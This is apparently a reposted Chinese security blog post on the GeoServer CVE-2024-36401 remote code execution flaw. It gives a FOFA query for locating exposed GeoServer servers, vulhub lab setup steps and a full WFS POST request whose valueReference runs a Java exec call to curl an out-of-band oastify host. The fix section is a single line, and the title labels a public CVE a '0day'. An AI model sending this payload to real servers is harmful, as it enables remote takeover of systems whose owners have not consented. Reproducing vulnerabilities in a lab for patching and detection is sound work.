一、资产简介
fofa
app="GeoServer"
页面
一、漏洞简述
GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作,通过 GeoServer 可以比较容易的在用户之间迅速共享空间地理信息。GeoServer是社区开源项目,可以直接通过社区网站下载,详细请查看本文档末的资源表。其接口/geoserver/wfs存在任意目命令执行漏洞,攻击者可通过该漏洞获取服务器权限。
二、环境搭建
https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401
此处使用vulhub的环境,因某些原因目前不能直接拉取docker需要先配置。
vi /etc/systemd/system/docker.service.d/proxy.conf #docker配置代理文件
#代理文件配置内容
[Service]
Environment="HTTP_PROXY=http://地址:端口/"
Environment="HTTPS_PROXY=http://地址:端口/"
Environment="NO_PROXY=localhost,127.0.0.1"
#导入配置,重启docker
systemctl daemon-reload
systemctl restart docker
#查看配置是否已经生效
systemctl show --property=Environment docker
#之后就可以按大家熟悉的命令拉取镜像了
docker-compose up -d
二、漏洞检测poc
注意事项:需要知道typeNames='sf:archsites'
POST /geoserver/wfs HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Content-Type: application/xml
Content-Length: 390
<wfs:GetPropertyValue service='WFS' version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'>
<wfs:Query typeNames='sf:archsites'/>
<wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'curl 123.go8o0k83qmfdt7zwl3ne8brdq4wvkt8i.oastify.com')</wfs:valueReference>
</wfs:GetPropertyValue>
dnslog
四、修复
官方已更新补丁,请升级至最新版本。
官网地址:https://geoserver.org/
原文始发于微信公众号(苏诺木安全团队):【0day】GeoServer CVE-2024-36401 远程代码执行漏洞【附poc】
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论